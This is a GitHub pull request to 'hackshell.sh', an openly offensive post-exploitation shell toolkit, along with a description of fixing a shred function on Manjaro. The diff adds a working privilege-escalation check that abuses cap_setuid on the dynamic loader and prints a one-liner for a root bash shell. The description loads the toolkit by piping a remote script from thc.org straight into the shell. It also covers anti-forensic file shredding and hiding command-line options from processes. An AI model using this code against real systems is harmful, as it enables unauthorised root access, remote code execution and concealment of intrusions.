### PR TITLE
fixed issue with shred function problem

### DIFF
--- a/hackshell.sh
+++ b/hackshell.sh
@@ -460,10 +460,10 @@ bin() {
     }
     unset _HS_SINGLE_MATCH
     [ -n "$is_showhelp" ] && {
-        [ -z "$FORCE" ] && echo -e ">>> Use ${CDC}FORCE=1 bin${CN} to ignore systemwide binaries"
+        [ -z "$FORCE" ] && echo -e ">>> Use ${CDC}FORCE=1 bin${CN} to download all"
         echo -e ">>> Use ${CDC}bin <name>${CN} to download a specific binary"
-        echo -e ">>> ${CW}TIP${CN}: Type ${CDC}zapme${CN} to hide all command line
->>> options from your current shell and all further processes."
+        echo -e ">>> ${CW}TIP${CN}: Type ${CDC}zapme${CN} to hide all command line options
+>>> from your current shell and all further processes."
         echo -e ">>> ${CDG}Download COMPLETE${CN}"
     }
 
@@ -588,6 +588,17 @@ lootlight() {
             echo "${str}"
             echo -en "${CN}"
             echo -e "${CW}TIP: ${CDC}"'./b00m -p -c "exec '"${HS_PY:-python}"' -c \"import os;os.setuid(0);os.setgid(0);os.execl('"'"'/bin/bash'"'"', '"'"'-bash'"'"')\""'"${CN}"
+        }
+
+        str="$( { readlink -f /lib64/ld-*.so.* || readlink -f /lib/ld-*.so.* || readlink -f /lib/ld-linux.so.2; } 2>/dev/null )"
+        [ -f "$str" ] && getcap "$str" 2>/dev/null | grep -qFm1 cap_setuid 2>/dev/null && {
+            echo -e "${CB}B00M-SHELL ${CDY}${CF}"
+            getcap "${str}" 2>/dev/null
+            echo -en "${CN}"
+            # BUG: Linux yells 'Inconsistency detected by ld.so: rtld.c: 1327: _dl_start_args_adjust: Assertion `auxv == sp + 1' failed!'
+            # if TMPDIR=/dev/shm and ld.so is used to load binary.
+            echo -en "${CW}TIP: ${CDC}unset TMPDIR; $str $(command -v "${HS_PY:-python}") -c"
+            echo "\$'import os\ntry:\n\tos.setuid(0)\n\tos.setgid(0)\nexcept:\n\tpass\n''"'os.execl("/bin/bash", "-bash");'"'"
         }
     }
 


### PR DESCRIPTION
If source the current hackshell in MnajaroLinux environment, then an error occurs when parsing the shred() function.
```bash
[UserName@localhost ~]% source <(curl -SsfL https://thc.org/hs)
bash: /dev/fd/63: line 187: syntax error near unexpected token `('
bash: /dev/fd/63: line 187: `command -v shred >/dev/null || shred() {'
```
I fixed line 187
```bash
# SHRED without shred command
custom_shred() {
    [[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; }
    dd status=none bs=1k count=$(du -sk "${1:?}" | cut -f1) if=/dev/urandom of="$1"
    rm -f "${1:?}"
}

if ! command -v shred >/dev/null; then
    alias shred='custom_shred'
fi

```

In this PR, I aim to change the judgment using an `OR` expression to an `if` statement and reapply the shred command using an alias (if the shred command binary does not exist). At least it worked in my ManjaroLinux as Blackarch environment.
![Screenshot_2024-08-14_15-21-55](https://github.com/user-attachments/assets/686d7622-ea18-43ed-b79a-9736c568a524)

If you have any questions, we are always available.
